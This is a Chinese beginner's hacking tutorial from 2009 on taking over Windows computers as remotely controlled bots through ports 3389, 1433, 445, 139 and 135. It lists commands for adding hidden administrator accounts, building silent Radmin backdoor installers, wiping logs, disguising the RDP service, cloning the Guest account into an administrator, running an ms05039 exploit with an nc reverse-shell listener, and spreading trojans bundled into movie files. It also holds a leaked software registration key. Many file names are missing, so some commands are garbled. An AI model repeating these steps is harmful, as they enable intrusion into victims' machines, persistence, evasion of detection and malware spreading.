2023年6月24日发(作者：)

新手抓鸡方法大全

2009-09-09 01:02

抓鸡很多人都会，但不一定全会，今天，我对所有方法做总结，也会介绍！

首先是端口抓鸡，一般比较常用！有3389、1433、445、139、135等

3389端口抓鸡

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA

6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；

（隐藏3389服务及不让管理发现自己程序）；（小榕的擦PP程序）；（开3389端口服务的）；（使用被禁止的Guest帐户要用到的）；（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet

开telnet服务

net user mint mint /add

添加用户mint密码为

mint net localgroup administrators mint /add

将帐号mint升级为管理员

三.上传后门程序(RADMIN服务端自解压程序)

制作过程:

1、到Radmin安装目录下找到、 和r_；

2、在本地设置服务端（一定要生成）；

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINESYSTEMRadmin的键值为；

4、编写一个批处理，并命名为；

@echo offnet stop r_server

5、写第二个批处理，,内容为：

@echo [url=mailto:off@]off@[/url] /

uninstall /silence@ /install /

silence@regedit /s @echo

[url=mailto:off@]off@[/url] /uninstall /

[url=mailto:silence@]silence@[/url] /install

/silence@regedit /

s @net start r_server@del

@del @del @del

6、将 (r_改名) 压缩成压缩包；

7、将制作成自解压文件；

选择的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%system32

安装程序:释放后运行: 释放前运行

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

四.用RADMIN客服端连接

上传文件到c:WINNT(XP是windows):

(如果是在XP下，这个要把里面的WINNT改为Windows)

最好再上传一个反弹后门RADMIN进入TELNET。

运行c:，重启肉鸡。

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题。

使用3389登陆，发现登陆用户已满，不用怕，我们把他踢出去。

telnet对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c: 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的的快捷方式。输入帐号mint密码mint，telnet对方ip，直接可以登陆对方电脑了。

使用命令：

c:query user (查看对方目前终端登陆状况。)

运行命令：

c:logoff 1(踢出去一个管理者)

再用c:query user检查一便~~(这就是为什么不马上用了)

六.连上后..在cmd下运行

c:winntlog . 自己的IP .(擦PP)

c: (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

if exists (select * from ects where id

= object_id(N’[dbo].[xp_cmdshell]’)

and OBJECTPROPERTY(id, N’IsExtendedProc’)

= 1) exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’GO

按F5(运行)，关了退出SQL Server再用SQL Server身位验证进一次，退出(这是为了不留下记录)。

八.改3389端口和服务名称

修改服务器端的端口设置，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal

ServerWdsrdpwdTdstcp]，PortNumber值，默认是3389，选择10进制，修改成所希望的端口，比如1314。

第二个地方：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal

ServerWinStationsRDP-Tcp] PortNumber值，默认是3389，选择10进制，修改成所希望的端口，比如1314。

要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]

的键值为文件。编辑文件，替换TermService为Alerter(错误警告服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明，改为你所换的服务说明，这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称，改为你所换的服务名称，这里改为Alerter)。保存，再导入注册表(这里要先运行(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)。

再在CMD下

CD c:winnt

system32 copy

(这里是复制为Alerter服务文件名差不多的文件)

CD C:winnt sc 127.0.0.1 config Alerter binpath=

c: (这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)用Radmin重启肉鸡

十.使用被禁用的帐户[Guest]登陆，删除自己开始建的帐号

1.使用展开注册表到

HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的后面的数值就是PID数值。

如：psu –p regedit –i 157

将Guest克成管理员权限，克成管理员权限的方法:

找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesAdministrator的类型值。

在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersGuest和他相应的类型值的数据)，然后删除Guest的配置。

2.查看计算机管理中帐户列表，刷新这时候会出现错误[找不到帐户](跳过这步也行)。

3.将Guest的配置(二个REG文件导进注册表)。

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。

net user Guest ****

[修改密码]net user Guest /

active:yesnet user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用。

6.用Guest登陆后删除自己建的帐号。

net user mint /del

3389抓鸡较为简单，适合初学者

1433端口抓鸡

用到工具：弱口令扫描器、X-scan、SQL综合利用工具、一个木马

先选择IP段，

扫描出开放了1433端口的电脑，

然后用X-scan扫出弱口令，

用弱口令使用SQL综合利用工具传马

445端口抓鸡

第一步，我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到！比如SUPERSCAN这个端口扫描工具。

第二步，假设现在我们已经得到一台存在445端口漏洞的主机，那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击：

F:445>ms05039 目标IP 本地IP 1234

F:445> -vv -l -p 1234

成功的话，就会返回一个shell，然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他，然后运行，这样得到一只肉鸡的CDMSHELL了。

139端口抓鸡

需要肉鸡开放139端口与IPC$共享，算是比较老的漏洞了，现在不怎么常用

net use 192.168.0.1ipc$ "" /user:administrator

连接的命令是：

net<空格>use<空格>IP地址ipc$<空格>密码<空格>/user:用户名

假设我要连接的目标IP地址是：192.168.1.11，用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的：

net use 192.168.1.11ipc$ 123456 /user:google 如果连接成功，那么系统会提示"命令成功完成"!

空密码是这样的：

如果密码是空的，那就在原先输入密码的地方以""代替。

开始查看权限：

查看登录后用户权限的方法很简单，只要给目标系统传个文件就可以了，如果传诵成功，那么一般都是系统管理员权限了，如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的：

copy<>文件绝对路径<>IP地址文件目标路径

比如我要将本地C盘下的文件拷贝到192.168.1.11的D盘下：

copy c: 192.168.1.11d$

要注意"$"符，那是隐藏共享盘的表示符，如果对方的共享盘不是隐藏的，就不需要"$"符了。如果命令执行成功，系统同样会提示"已复制 1 个文件"

135端口抓鸡

大家肯定不陌生，还是比较多人用的，教程也有很多，全自动抓的工具也很多，就简单介绍一下，

首先自己电脑要开放相应服务

用扫描器扫出开放了135端口的电脑

然后用NT-scan扫描弱口令

Recton进行开肉鸡23端口

开完后我们就TELNET命令连接肉鸡`

好了`成功拿到CMD权限``

下面我们共享它的C盘`输入命令：net share c=c:/

接着就是啊D网络工具包传马，然后就肉鸡上线了！

还有80端口，其实就是挂网马，

首先用获得某网站webshell，然后用网马生成器生成，挂马

捆绑木马抓鸡

在电影等文件中捆绑木马，然后上传到网站上，比如迅雷的雷区，只要免杀好，是不会报毒的！